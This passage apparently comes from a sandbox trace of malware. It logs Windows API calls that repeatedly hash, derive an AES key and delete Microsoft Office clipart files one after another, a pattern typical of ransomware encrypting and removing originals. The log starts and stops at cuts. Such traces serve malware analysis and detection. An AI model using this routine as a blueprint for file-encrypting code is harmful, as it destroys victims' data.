returned 0x2 [0200.940] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.940] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.941] CryptDestroyKey (hKey=0x9ad378) returned 1 [0200.941] CryptDestroyHash (hHash=0x9ad738) returned 1 [0200.941] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0200.943] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0200.943] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.943] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad778) returned 1 [0200.943] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.943] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.943] wcslen (_String="\\\\?\\") returned 0x4 [0200.980] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 1 [0200.980] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf")) returned 1 [0200.981] CryptDestroyKey (hKey=0x9ad478) returned 1 [0200.982] wcslen (_String="OK") returned 0x2 [0200.982] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.982] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.982] CryptDestroyKey (hKey=0x9ad778) returned 1 [0200.982] CryptDestroyHash (hHash=0x9ad438) returned 1 [0200.982] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0200.984] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0200.984] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0200.984] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad1b8) returned 1 [0200.984] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0200.984] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0200.984] wcslen (_String="\\\\?\\") returned 0x4 [0200.997] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 1 [0200.997] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf")) returned 1 [0200.998] CryptDestroyKey (hKey=0x9ad278) returned 1 [0200.998] wcslen (_String="OK") returned 0x2 [0200.998] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.998] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0200.998] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0200.998] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0200.998] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0201.001] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0201.001] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.001] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad7f8) returned 1 [0201.001] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0201.001] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0201.001] wcslen (_String="\\\\?\\") returned 0x4 [0201.006] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 1 [0201.006] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02158_.wmf")) returned 1 [0201.007] CryptDestroyKey (hKey=0x9ad138) returned 1 [0201.007] wcslen (_String="OK") returned 0x2 [0201.007] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.007] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.007] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0201.007] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0201.007] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0201.013] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0201.013] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.013] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad838) returned 1 [0201.013] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0201.013] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0201.013] wcslen (_String="\\\\?\\") returned 0x4 [0201.030] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 1 [0201.030] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02161_.wmf")) returned 1 [0201.034] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0201.034] wcslen (_String="OK") returned 0x2 [0201.034] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.034] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.034] CryptDestroyKey (hKey=0x9ad838) returned 1 [0201.034] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0201.034] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0201.047] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0201.048] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.048] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad1b8) returned 1 [0201.048] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0201.048] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0201.048] wcslen (_String="\\\\?\\") returned 0x4 [0201.054] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 1 [0201.054] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid")) returned 1 [0201.056] CryptDestroyKey (hKey=0x9ad538) returned 1 [0201.056] wcslen (_String="OK") returned 0x2 [0201.056] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.056] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.056] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0201.056] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0201.056] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0201.058] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0201.058] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.058] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad338) returned 1 [0201.058] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0201.058] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0201.058] wcslen (_String="\\\\?\\") returned 0x4 [0201.071] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 1 [0201.071] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid")) returned 1 [0201.072] CryptDestroyKey (hKey=0x9ad678) returned 1 [0201.073] wcslen (_String="OK") returned 0x2 [0201.073] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.073] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.073] CryptDestroyKey (hKey=0x9ad338) returned 1 [0201.073] CryptDestroyHash (hHash=0x9ad438) returned 1 [0201.073] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0201.075] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449a4 | out: phHash=0x1d4449a4) returned 1 [0201.075] CryptHashData (hHash=0x9ad278, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.075] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4449a8 | out: phKey=0x1d4449a8*=0x9ad478) returned 1 [0201.075] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0201.075] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0201.075] wcslen (_String="\\\\?\\") returned 0x4 [0201.079] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF") returned 1 [0201.079] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\flap.wmf")) returned 1 [0201.080] CryptDestroyKey (hKey=0x9ad138) returned 1 [0201.080] wcslen (_String="OK") returned 0x2 [0201.080] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.080] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.080] CryptDestroyKey (hKey=0x9ad478) returned 1 [0201.080] CryptDestroyHash (hHash=0x9ad278) returned 1 [0201.080] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0201.082] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0201.082] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.082] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad438) returned 1 [0201.082] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0201.082] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0201.082] wcslen (_String="\\\\?\\") returned 0x4 [0201.102] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 1 [0201.102] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid")) returned 1 [0201.104] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0201.104] wcslen (_String="OK") returned 0x2 [0201.104] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.104] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.104] CryptDestroyKey (hKey=0x9ad438) returned 1 [0201.104] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0201.104] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0201.106] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0201.106] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.106] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad678) returned 1 [0201.106] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0201.106] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0201.106] wcslen (_String="\\\\?\\") returned 0x4 [0201.635] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 1 [0201.635] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid")) returned 1 [0201.636] CryptDestroyKey (hKey=0x9ad378) returned 1 [0201.636] wcslen (_String="OK") returned 0x2 [0201.636] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.636] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0201.636] CryptDestroyKey (hKey=0x9ad678) returned 1 [0201.636] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0201.636] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0201.638] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0201.638] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.638] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad738) returned 1 [0201.639] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0201.639] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0201.639] wcslen (_String="\\\\?\\") returned 0x4 [0202.659] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 1 [0202.659] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00057_.wmf")) returned 1 [0202.660] CryptDestroyKey (hKey=0x9ad138) returned 1 [0202.660] wcslen (_String="OK") returned 0x2 [0202.660] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0202.660] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0202.660] CryptDestroyKey (hKey=0x9ad738) returned 1 [0202.660] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0202.660] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0202.663] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0202.663] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.663] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad538) returned 1 [0202.663] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0202.663] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0202.663] wcslen (_String="\\\\?\\") returned 0x4 [0202.673] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 1 [0202.673] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00084_.wmf")) returned 1 [0202.675] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0202.675] wcslen (_String="OK") returned 0x2 [0202.675] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0202.675] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0202.675] CryptDestroyKey (hKey=0x9ad538) returned 1 [0202.675] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0202.675] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0202.677] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0202.677] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.677] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad2b8) returned 1 [0202.677] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0202.677] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0202.677] wcslen (_String="\\\\?\\") returned 0x4 [0202.737] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 1 [0202.737] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00231_.wmf")) returned 1 [0202.738] CryptDestroyKey (hKey=0x9ad278) returned 1 [0202.738] wcslen (_String="OK") returned 0x2 [0202.738] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0202.738] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0202.738] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0202.738] CryptDestroyHash (hHash=0x9ad838) returned 1 [0202.738] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0202.741] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0202.741] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.741] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad1b8) returned 1 [0202.741] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0202.741] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0202.741] wcslen (_String="\\\\?\\") returned 0x4 [0202.781] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 1 [0202.782] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00235_.wmf")) returned 1 [0202.783] CryptDestroyKey (hKey=0x9ad338) returned 1 [0202.783] wcslen (_String="OK") returned 0x2 [0202.783] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0202.783] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0202.783] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0202.783] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0202.783] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0202.785] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0202.785] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.785] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad4b8) returned 1 [0202.785] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0202.785] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0202.785] wcslen (_String="\\\\?\\") returned 0x4 [0202.987] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 1 [0202.987] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00236_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00236_.wmf")) returned 1 [0202.988] CryptDestroyKey (hKey=0x9ad838) returned 1 [0202.988] wcslen (_String="OK") returned 0x2 [0202.988] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0202.988] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0202.988] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0202.988] CryptDestroyHash (hHash=0x9ad478) returned 1 [0202.988] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0202.993] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0202.993] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.994] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad138) returned 1 [0202.994] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0202.994] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0202.994] wcslen (_String="\\\\?\\") returned 0x4 [0203.029] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 1 [0203.029] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00241_.wmf")) returned 1 [0203.030] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0203.030] wcslen (_String="OK") returned 0x2 [0203.030] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.030] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.030] CryptDestroyKey (hKey=0x9ad138) returned 1 [0203.030] CryptDestroyHash (hHash=0x9ad578) returned 1 [0203.030] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0203.033] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0203.033] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.033] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad4b8) returned 1 [0203.033] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.033] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.033] wcslen (_String="\\\\?\\") returned 0x4 [0203.051] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 1 [0203.051] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00260_.wmf")) returned 1 [0203.052] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0203.052] wcslen (_String="OK") returned 0x2 [0203.052] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.052] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.052] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0203.052] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0203.052] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0203.055] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0203.055] CryptHashData (hHash=0x9ad878, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.055] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad4f8) returned 1 [0203.055] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.055] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.055] wcslen (_String="\\\\?\\") returned 0x4 [0203.076] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 1 [0203.076] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00276_.wmf")) returned 1 [0203.077] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0203.077] wcslen (_String="OK") returned 0x2 [0203.077] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.077] fflush (in: _File=0x77ac1228 | out: 